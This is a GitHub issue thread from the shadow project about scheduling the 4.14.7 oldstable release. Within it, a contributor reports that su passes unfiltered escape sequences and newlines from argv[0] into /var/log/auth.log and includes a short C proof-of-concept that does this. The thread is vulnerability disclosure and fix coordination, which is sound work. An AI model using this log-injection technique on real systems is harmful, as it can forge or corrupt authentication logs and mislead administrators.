4.14.7 oldstable release

shadow-maint / shadow

Upstream shadow tree

Other

290 stars 228 forks source link

4.14.7 oldstable release #959

Closed alejandro-colomar closed 4 months ago

alejandro-colomar commented 5 months ago

And it seems we already have cheese for this. Let's release .7 on the next full moon after the first patches are ready; so possibly on 2024-03-25.

Cc: @skyler-ferrante

skyler-ferrante commented 5 months ago

I tested a few other commands, and it seems like su was the only one that allowed messages to go to auth.log. To summarize the issue I sent in my email, su was allowing an attacker message to go to /var/log/auth.log without checking if it had newlines or escape sequences.

A quick PoC:

#include<stdio.h>
#include<unistd.h>
int main(){
        char* prog = "/usr/bin/su";
        char* argv[] = {"\033[33mYellow", "root", NULL};
        char* envp[] = {NULL};
        execve(prog, argv, envp);
        printf("Failed to exec\n");
}

alejandro-colomar commented 5 months ago

False alarm. I'll close the issue while there's nothing to fix.

alejandro-colomar commented 5 months ago

The plans for the next moon are alive again. Maybe even earlier, if possible.

https://github.com/shadow-maint/shadow/pull/960

alejandro-colomar commented 5 months ago

https://github.com/shadow-maint/shadow/pull/962